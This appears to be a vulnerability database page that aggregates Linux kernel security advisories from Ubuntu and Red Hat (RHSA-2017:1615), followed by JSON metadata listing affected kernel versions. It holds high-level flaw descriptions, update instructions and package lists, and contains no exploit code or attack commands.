Vlad Tsyrklevich discovered an integer overflow vulnerability in the VFIO PCI driver for the Linux kernel. A local attacker with access to a vfio PCI device file could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2016-9083, CVE-2016-9084)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 16.04 LTS: linux-image-4.4.0-1014-gke 4.4.0-1014.14 linux-image-4.4.0-1018-aws 4.4.0-1018.27 linux-image-4.4.0-1057-raspi2 4.4.0-1057.64 linux-image-4.4.0-1059-snapdragon 4.4.0-1059.63 linux-image-4.4.0-79-generic 4.4.0-79.100 linux-image-4.4.0-79-generic-lpae 4.4.0-79.100 linux-image-4.4.0-79-lowlatency 4.4.0-79.100 linux-image-4.4.0-79-powerpc-e500mc 4.4.0-79.100 linux-image-4.4.0-79-powerpc-smp 4.4.0-79.100 linux-image-4.4.0-79-powerpc64-smp 4.4.0-79.100 linux-image-aws 4.4.0.1018.21 linux-image-generic 4.4.0.79.85 linux-image-generic-lpae 4.4.0.79.85 linux-image-gke 4.4.0.1014.16 linux-image-lowlatency 4.4.0.79.85 linux-image-powerpc-e500mc 4.4.0.79.85 linux-image-powerpc-smp 4.4.0.79.85 linux-image-powerpc64-emb 4.4.0.79.85 linux-image-powerpc64-smp 4.4.0.79.85 linux-image-raspi2 4.4.0.1057.58 linux-image-snapdragon 4.4.0.1059.52 linux-image-virtual 4.4.0.79.85

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. Relevant releases/architectures:

MRG Realtime for RHEL 6 Server v.2 - noarch, x86_64

  1. (BZ#1452745)

  2. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2017:1615-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2017:1615 Issue date: 2017-06-28 CVE Names: CVE-2017-2583 CVE-2017-6214 CVE-2017-7477 CVE-2017-7645 CVE-2017-7895 =====================================================================

  1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

Security Fix(es):

  • A flaw was found in the way Linux kernel allocates heap memory to build the scattergather list from a fragment list(skb_shinfo(skb)->frag_list) in the socket buffer(skb_buff). The heap overflow occurred if 'MAX_SKB_FRAGS + 1' parameter and 'NETIF_F_FRAGLIST' feature were used together. A remote user or process could use this flaw to potentially escalate their privilege on a system. (CVE-2017-7477, Important)

  • The NFS2/3 RPC client could send long arguments to the NFS server. These encoded arguments are stored in an array of memory pages, and accessed using pointer variables. Arbitrarily long arguments could make these pointers point outside the array and cause an out-of-bounds memory access. A remote user or program could use this flaw to crash the kernel (denial of service). (CVE-2017-7895, Important)

  • The Linux kernel built with the Kernel-based Virtual Machine (CONFIG_KVM) support was vulnerable to an incorrect segment selector(SS) value error. The error could occur while loading values into the SS register in long mode. A user or process inside a guest could use this flaw to crash the guest, resulting in DoS or potentially escalate their privileges inside the guest. (CVE-2017-2583, Moderate)

  • A flaw was found in the Linux kernel's handling of packets with the URG flag. Applications using the splice() and tcp_splice_read() functionality could allow a remote attacker to force the kernel to enter a condition in which it could loop indefinitely. (CVE-2017-6214, Moderate)

Red Hat would like to thank Ari Kauppi for reporting CVE-2017-7895 and Xiaohan Zhang (Huawei Inc.) for reporting CVE-2017-2583.

Bug Fix(es):

  • Previously, the reserved-pages counter (HugePages_Rsvd) was bigger than the total-pages counter (HugePages_Total) in the /proc/meminfo file, and HugePages_Rsvd underflowed. With this update, the HugeTLB feature of the Linux kernel has been fixed, and HugePages_Rsvd underflow no longer occurs. (BZ#1445184)

  • If a directory on a NFS client was modified while being listed, the NFS client could restart the directory listing multiple times. Consequently, the performance of listing the directory was sub-optimal. With this update, the restarting of the directory listing happens less frequently. As a result, the performance of listing the directory while it is being modified has improved. (BZ#1450851)

  • The Fibre Channel over Ethernet (FCoE) adapter in some cases failed to reboot. This update fixes the qla2xxx driver, and FCoE adapter now reboots as expected. (BZ#1446246)

  • When a VM with Virtual Function I/O (VFIO) device was rebooted, the QEMU process occasionally terminated unexpectedly due to a failed VFIO Direct Memory Access (DMA) map request. This update fixes the vfio driver and QEMU no longer crashes in the described situation. (BZ#1450855)

  • When the operating system was booted with the in-box lpfc driver, a kernel panic occurred on the little-endian variant of IBM Power Systems. This update fixes lpfc, and the kernel no longer panics in the described situation. (BZ#1452044)

  • When creating or destroying a VM with Virtual Function I/O (VFIO) devices with "Hugepages" feature enabled, errors in Direct Memory Access (DMA) page table entry (PTE) mappings occurred, and QEMU memory usage behaved unpredictably. This update fixes range computation when making room for large pages in Input/Output Memory Management Unit (IOMMU). As a result, errors in DMA PTE mappings no longer occur, and QEMU has a predictable memory usage in the described situation. (BZ#1450856)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1414735 - CVE-2017-2583 Kernel: Kvm: vmx/svm potential privilege escalation inside guest 1426542 - CVE-2017-6214 kernel: ipv4/tcp: Infinite loop in tcp_splice_read() 1443615 - CVE-2017-7645 kernel: nfsd: Incorrect handling of long RPC replies 1445207 - CVE-2017-7477 kernel: net: Heap overflow in skb_to_sgvec in macsec.c 1446103 - CVE-2017-7895 kernel: NFSv3 server does not properly handle payload bounds checking of WRITE requests

  1. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: kernel-3.10.0-514.26.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-514.26.1.el7.noarch.rpm kernel-doc-3.10.0-514.26.1.el7.noarch.rpm

x86_64: kernel-3.10.0-514.26.1.el7.x86_64.rpm kernel-debug-3.10.0-514.26.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-514.26.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-514.26.1.el7.x86_64.rpm kernel-devel-3.10.0-514.26.1.el7.x86_64.rpm kernel-headers-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-514.26.1.el7.x86_64.rpm perf-3.10.0-514.26.1.el7.x86_64.rpm perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm python-perf-3.10.0-514.26.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64: kernel-debug-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-514.26.1.el7.x86_64.rpm perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: kernel-3.10.0-514.26.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-514.26.1.el7.noarch.rpm kernel-doc-3.10.0-514.26.1.el7.noarch.rpm

x86_64: kernel-3.10.0-514.26.1.el7.x86_64.rpm kernel-debug-3.10.0-514.26.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-514.26.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-514.26.1.el7.x86_64.rpm kernel-devel-3.10.0-514.26.1.el7.x86_64.rpm kernel-headers-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-514.26.1.el7.x86_64.rpm perf-3.10.0-514.26.1.el7.x86_64.rpm perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm python-perf-3.10.0-514.26.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64: kernel-debug-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-514.26.1.el7.x86_64.rpm perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: kernel-3.10.0-514.26.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-514.26.1.el7.noarch.rpm kernel-doc-3.10.0-514.26.1.el7.noarch.rpm

ppc64: kernel-3.10.0-514.26.1.el7.ppc64.rpm kernel-bootwrapper-3.10.0-514.26.1.el7.ppc64.rpm kernel-debug-3.10.0-514.26.1.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm kernel-debug-devel-3.10.0-514.26.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-514.26.1.el7.ppc64.rpm kernel-devel-3.10.0-514.26.1.el7.ppc64.rpm kernel-headers-3.10.0-514.26.1.el7.ppc64.rpm kernel-tools-3.10.0-514.26.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm kernel-tools-libs-3.10.0-514.26.1.el7.ppc64.rpm perf-3.10.0-514.26.1.el7.ppc64.rpm perf-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm python-perf-3.10.0-514.26.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm

ppc64le: kernel-3.10.0-514.26.1.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-514.26.1.el7.ppc64le.rpm kernel-debug-3.10.0-514.26.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-514.26.1.el7.ppc64le.rpm kernel-devel-3.10.0-514.26.1.el7.ppc64le.rpm kernel-headers-3.10.0-514.26.1.el7.ppc64le.rpm kernel-tools-3.10.0-514.26.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm kernel-tools-libs-3.10.0-514.26.1.el7.ppc64le.rpm perf-3.10.0-514.26.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm python-perf-3.10.0-514.26.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm

s390x: kernel-3.10.0-514.26.1.el7.s390x.rpm kernel-debug-3.10.0-514.26.1.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-514.26.1.el7.s390x.rpm kernel-debug-devel-3.10.0-514.26.1.el7.s390x.rpm kernel-debuginfo-3.10.0-514.26.1.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-514.26.1.el7.s390x.rpm kernel-devel-3.10.0-514.26.1.el7.s390x.rpm kernel-headers-3.10.0-514.26.1.el7.s390x.rpm kernel-kdump-3.10.0-514.26.1.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-514.26.1.el7.s390x.rpm kernel-kdump-devel-3.10.0-514.26.1.el7.s390x.rpm perf-3.10.0-514.26.1.el7.s390x.rpm perf-debuginfo-3.10.0-514.26.1.el7.s390x.rpm python-perf-3.10.0-514.26.1.el7.s390x.rpm python-perf-debuginfo-3.10.0-514.26.1.el7.s390x.rpm

x86_64: kernel-3.10.0-514.26.1.el7.x86_64.rpm kernel-debug-3.10.0-514.26.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-514.26.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-514.26.1.el7.x86_64.rpm kernel-devel-3.10.0-514.26.1.el7.x86_64.rpm kernel-headers-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-514.26.1.el7.x86_64.rpm perf-3.10.0-514.26.1.el7.x86_64.rpm perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm python-perf-3.10.0-514.26.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch: kernel-doc-3.10.0-514.26.1.el7.noarch.rpm

ppc64: kernel-debug-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-514.26.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-514.26.1.el7.ppc64.rpm perf-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm

ppc64le: kernel-debug-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm kernel-debug-devel-3.10.0-514.26.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-514.26.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-514.26.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm

x86_64: kernel-debug-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-514.26.1.el7.x86_64.rpm perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: kernel-3.10.0-514.26.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-514.26.1.el7.noarch.rpm kernel-doc-3.10.0-514.26.1.el7.noarch.rpm

x86_64: kernel-3.10.0-514.26.1.el7.x86_64.rpm kernel-debug-3.10.0-514.26.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-514.26.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-514.26.1.el7.x86_64.rpm kernel-devel-3.10.0-514.26.1.el7.x86_64.rpm kernel-headers-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-514.26.1.el7.x86_64.rpm perf-3.10.0-514.26.1.el7.x86_64.rpm perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm python-perf-3.10.0-514.26.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64: kernel-debug-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-514.26.1.el7.x86_64.rpm perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2017-2583 https://access.redhat.com/security/cve/CVE-2017-6214 https://access.redhat.com/security/cve/CVE-2017-7477 https://access.redhat.com/security/cve/CVE-2017-7645 https://access.redhat.com/security/cve/CVE-2017-7895 https://access.redhat.com/security/updates/classification/#important

https://access.redhat.com/articles/3090941.

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2017 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iD8DBQFZU/jWXlSAg2UNWIIRAr2tAKCNLfAoYb4N6aC4Ku6JOiP/yO9YVQCgoj0+ EY56W3xvQDrvUk2IIHHZzi4= =ObbT -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201704-1397",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.1.40"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10.14"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.67"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.26"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16.44"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.2.89"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.17.0"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "linux",
        "version": "4.10.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.80"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.65"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
